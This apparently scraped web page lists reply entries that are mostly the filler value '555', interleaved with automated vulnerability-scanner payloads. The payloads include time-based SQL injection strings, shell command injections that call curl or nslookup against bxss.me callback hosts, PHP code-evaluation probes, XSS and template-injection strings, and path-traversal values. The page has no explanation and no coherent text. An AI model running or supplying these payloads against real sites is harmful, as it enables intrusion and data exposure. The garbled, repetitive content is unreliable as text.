| 123 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 1yzmQfqGO |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| MIMUP3Dg |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 9Qj2uq8O: CAGcIYZ0 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
|
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
|
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| '+response.write(9325084*9557021)+' |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| http://9lotto.co.kr/ |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| "+response.write(9325084*9557021)+" |
x
|
|
|
|
|
| ../555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| HttP://bxss.me/t/xss.html?%00 |
x
|
|
|
|
|
| ".gethostbyname(lc("hitjd"."almhrytm6e096.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(80).chr(119).chr(82)." |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| gethostbyname(lc('hitqe'.'ssfkejro98a0b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(85).chr(102).chr(72) |
x
|
|
|
|
|
| 9lotto.co.kr |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg |
x
|
|
|
|
|
| reply_write_result.jsp |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| ';print(md5(31337));$a=' |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| reply_write_result.jsp/. |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| ";print(md5(31337));$a=" |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| "+"A".concat(70-3).concat(22*4).concat(100).concat(73).concat(122).concat(86)+(require"socket"
Socket.gethostbyname("hitgv"+"wdykiueofd37f.bxss.me.")[3].to_s)+" |
x
|
|
|
|
|
| ${@print(md5(31337))} |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| xfs.bxss.me |
x
|
|
|
|
|
| '+'A'.concat(70-3).concat(22*4).concat(102).concat(87).concat(108).concat(90)+(require'socket'
Socket.gethostbyname('hitoi'+'zuydvaai1e86b.bxss.me.')[3].to_s)+' |
x
|
|
|
|
|
| 555&echo rjixat$()\ fzaore\nz^xyu||a #' &echo rjixat$()\ fzaore\nz^xyu||a #|" &echo rjixat$()\ fzaore\nz^xyu||a # |
x
|
|
|
|
|
| |echo xwtlsm$()\ zfscuz\nz^xyu||a #' |echo xwtlsm$()\ zfscuz\nz^xyu||a #|" |echo xwtlsm$()\ zfscuz\nz^xyu||a # |
x
|
|
|
|
|
| 555|echo cjurfh$()\ cmthoq\nz^xyu||a #' |echo cjurfh$()\ cmthoq\nz^xyu||a #|" |echo cjurfh$()\ cmthoq\nz^xyu||a # |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| ./reply_write_result.jsp |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| (nslookup -q=cname hitwiauugvuqj205be.bxss.me||curl hitwiauugvuqj205be.bxss.me)) |
x
|
|
|
|
|
| |(nslookup${IFS}-q${IFS}cname${IFS}hitlkukrsajym9b727.bxss.me||curl${IFS}hitlkukrsajym9b727.bxss.me) |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| &(nslookup${IFS}-q${IFS}cname${IFS}hitayvbfgvikx4369a.bxss.me||curl${IFS}hitayvbfgvikx4369a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitayvbfgvikx4369a.bxss.me||curl${IFS}hitayvbfgvikx4369a.bxss.me)&`' |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| -1" OR 2+465-465-1=0+0+0+1 -- |
x
|
|
|
|
|
| (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ |
x
|
|
|
|
|
| 555-1 waitfor delay '0:0:15' -- |
x
|
|
|
|
|
| 555hQVXecaq')) OR 608=(SELECT 608 FROM PG_SLEEP(15))-- |
x
|
|
|
|
|
| 555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' |
x
|
|
|
|
|
| @@1q8jH |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555 |
x
|
|
|
|
|
| 555'"()&% |
x
|
|
|
|
|
| '"()&% |
x
|
|
|
|
|
| 5559886873 |
x
|
|
|
|
|
| bfg7380<s1﹥s2ʺs3ʹhjl7380 |
x
|
|
|
|
|
| bfgx8351��z1��z2a�bcxhjl8351 |
x
|
|
|
|
|
| <%={{={@{#{${dfb}}%> |
x
|
|
|
|
|
|
x
|
|
|
|
|
| 1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%> |
x
|
|
|
|
|
| 555-->
|